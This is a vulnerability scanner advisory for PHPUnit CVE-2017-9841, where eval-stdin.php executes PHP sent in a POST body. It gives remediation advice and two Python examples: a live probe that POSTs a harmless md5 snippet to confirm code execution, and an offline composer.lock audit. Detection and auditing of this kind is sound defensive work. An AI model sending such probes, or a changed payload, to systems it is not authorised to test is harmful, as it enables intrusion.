PHPUnit Remote Code Execution

critical Web App Scanning Plugin ID 98984

Synopsis

PHPUnit Remote Code Execution

Description

PHPUnit is a testing framework for PHP used to run unit tests during application development. PHPUnit versions before 4.8.28 and 5.x before 5.6.3 ship a helper script, src/Util/PHP/eval-stdin.php, that evaluates whatever it reads from the request body as PHP code. When the application's vendor directory is reachable over HTTP, an unauthenticated remote attacker can POST PHP source to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI and have it executed by the web server with the application's privileges (CVE-2017-9841). The script is a test helper that is only meant to be invoked by PHPUnit itself; the exposure comes from deploying a development dependency into a web-accessible directory.
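The check a scanner runs for this finding, written here as an added example (it is not Tenable's plugin code): POST a short PHP snippet to the script and look in the response for a value PHP had to compute, rather than for the snippet itself, so that a server that merely reflects request bodies (an error page, a WAF, a debug handler) is not mistaken for one that executes them. The probe seed and the classification labels are this example's own choices; `probe()` makes a live HTTP request and is only run when a base URL is passed on the command line.

```python
import hashlib
import http.client
import sys
from urllib.parse import urlsplit

# Path named in the advisory; the composer package installs under vendor/phpunit/phpunit.
EVAL_STDIN_URI = "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"


def probe_payload(seed: str = "phpunit"):
    """Return (php_source, expected_marker) for one probe.

    The script evaluates the raw POST body, so the body is PHP source. The
    marker is the hex MD5 of the seed: PHP's md5() returns the same lowercase
    hex as hashlib, and the server cannot produce it without running the code.
    """
    marker = hashlib.md5(seed.encode()).hexdigest()
    source = f'<?php echo md5("{seed}"); ?>'
    return source, marker


def classify_response(body: str, source: str, marker: str) -> str:
    """Classify one HTTP response body to the probe.

    'executed'    the digest is present: the server ran our PHP (confirmed).
    'reflected'   our PHP source came back verbatim but not the digest: the
                  server echoed the request body; not a confirmed RCE.
    'not_exposed' anything else (404 page, static text, empty body).
    """
    if marker in body:
        return "executed"
    if source in body:
        return "reflected"
    return "not_exposed"


def probe(base_url: str, timeout: float = 10.0) -> str:
    """Send the probe to base_url (scheme://host[:port]) and classify the reply."""
    parts = urlsplit(base_url)
    conn_cls = (http.client.HTTPSConnection if parts.scheme == "https"
                else http.client.HTTPConnection)
    conn = conn_cls(parts.hostname, parts.port, timeout=timeout)
    source, marker = probe_payload()
    try:
        conn.request("POST", EVAL_STDIN_URI, body=source.encode(),
                     headers={"Content-Type": "text/plain"})
        resp = conn.getresponse()
        body = resp.read().decode("utf-8", errors="replace")
        return classify_response(body, source, marker)
    finally:
        conn.close()


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(probe(sys.argv[1]))
    else:
        print("usage: probe.py http://host[:port]")
```

Only 'executed' is a confirmed finding; 'reflected' means the path answered but the body was echoed rather than evaluated, which is worth a manual look but is not this vulnerability.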

Solution

Upgrade to PHPUnit 4.8.28 or later on the 4.x branch, or 5.6.3 or later on the 5.x branch (the fix commit is linked below). Because PHPUnit is a development dependency, it should not be deployed with production code at all: install with `composer install --no-dev` and deny web access to the vendor directory so that no bundled tooling is reachable over HTTP.
Some vendors bundle PHPUnit in their software releases without using it. If it is not required, check with the vendor whether it can be safely removed from the application.
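An offline audit of a deployed application directory, added here as an example and not part of the plugin or of PHPUnit: it reads composer.lock to find the installed phpunit/phpunit version, applies the fixed-version boundaries from this advisory (4.8.28 on 4.x, 5.6.3 on 5.x), notes whether the package sits in `packages-dev` (in which case `composer install --no-dev` would keep it out of production), and checks whether the eval-stdin.php script is actually present under the web root. The `at_risk` rule, the report keys and the `build_sample_docroot` fixture are this example's own constructions.

```python
import json
import re
import tempfile
from pathlib import Path

# Relative path under the web root named in the advisory (composer layout).
EVAL_STDIN_REL = Path("vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php")


def parse_version(version: str) -> tuple:
    """'v5.6.2', '4.8.27', '5.7.0-rc1' -> (major, minor, patch); missing parts are 0."""
    nums = [int(n) for n in re.findall(r"\d+", version)[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def is_vulnerable_version(version: str) -> bool:
    """Fixed releases per the advisory: 4.8.28 on the 4.x line, 5.6.3 on 5.x.

    Everything below 4.8.28 (including older major lines) is treated as
    affected; 6.x and later were released after the fix.
    """
    v = parse_version(version)
    if v[0] == 5:
        return v < (5, 6, 3)
    if v[0] <= 4:
        return v < (4, 8, 28)
    return False


def phpunit_from_lock(lock_text: str):
    """Return (version, section) for phpunit/phpunit in composer.lock, else (None, None).

    section == 'packages-dev' means a dev-only dependency that a
    'composer install --no-dev' deployment would not ship.
    """
    lock = json.loads(lock_text)
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            if pkg.get("name") == "phpunit/phpunit":
                return pkg.get("version"), section
    return None, None


def audit_docroot(docroot: Path) -> dict:
    """Offline check of one deployed application directory."""
    report = {
        "eval_stdin_present": (docroot / EVAL_STDIN_REL).is_file(),
        "version": None,
        "section": None,
        "vulnerable_version": None,   # None when the version is unknown
    }
    lock = docroot / "composer.lock"
    if lock.is_file():
        report["version"], report["section"] = phpunit_from_lock(lock.read_text())
        if report["version"]:
            report["vulnerable_version"] = is_vulnerable_version(report["version"])
    # The script being present with an affected or unknown version is the
    # actionable finding; a fixed version with the script present is still
    # dev tooling that should not be in the web root, but not this CVE.
    report["at_risk"] = (report["eval_stdin_present"]
                         and report["vulnerable_version"] is not False)
    return report


def build_sample_docroot(root: Path, version: str) -> Path:
    """Constructed fixture, not a real deployment: minimal web root with
    a composer.lock and a placeholder standing in for the shipped script."""
    script = root / EVAL_STDIN_REL
    script.parent.mkdir(parents=True, exist_ok=True)
    script.write_text("<?php // placeholder for eval-stdin.php in this fixture\n")
    (root / "composer.lock").write_text(json.dumps({
        "packages": [],
        "packages-dev": [{"name": "phpunit/phpunit", "version": version}],
    }))
    return root


def audit_sample(version: str) -> dict:
    """Build a throwaway fixture at the given PHPUnit version and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_docroot(build_sample_docroot(Path(tmp), version))


if __name__ == "__main__":
    for v in ("4.8.27", "5.6.2", "5.6.3"):
        print(v, audit_sample(v))
```

Run `audit_docroot(Path("/var/www/app"))` against a real web root; a report with `eval_stdin_present` true and `section` equal to `packages-dev` is the usual case of a dev dependency that was deployed with `composer install` instead of `composer install --no-dev`.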

See Also

http://web.archive.org/web/20170701212357/http://phpunit.vulnbusters.com/

https://github.com/sebastianbergmann/phpunit/commit/284a69fb88a2d0845d23f42974a583d8f59bf5a5

Plugin Details

Severity: Critical

ID: 98984

Type: remote

Published: 3/11/2020

Updated: 9/7/2021

Scan Template: api, basic, full, pci, scan

Risk Information

VPR

Risk Factor: Critical

Score: 9.0

CVSS v2

Risk Factor: High

Base Score: 7.5

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS Score Source: CVE-2017-9841

CVSS v3

Risk Factor: Critical

Base Score: 9.8

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS Score Source: CVE-2017-9841

Vulnerability Information

CPE: cpe:2.3:a:phpunit_project:phpunit:*:*:*:*:*:*:*:*

Exploit Available: true

Exploit Ease: Exploits are available

CISA Known Exploited Vulnerability Due Dates: 8/15/2022

Reference Information

CVE: CVE-2017-9841

BID: 101798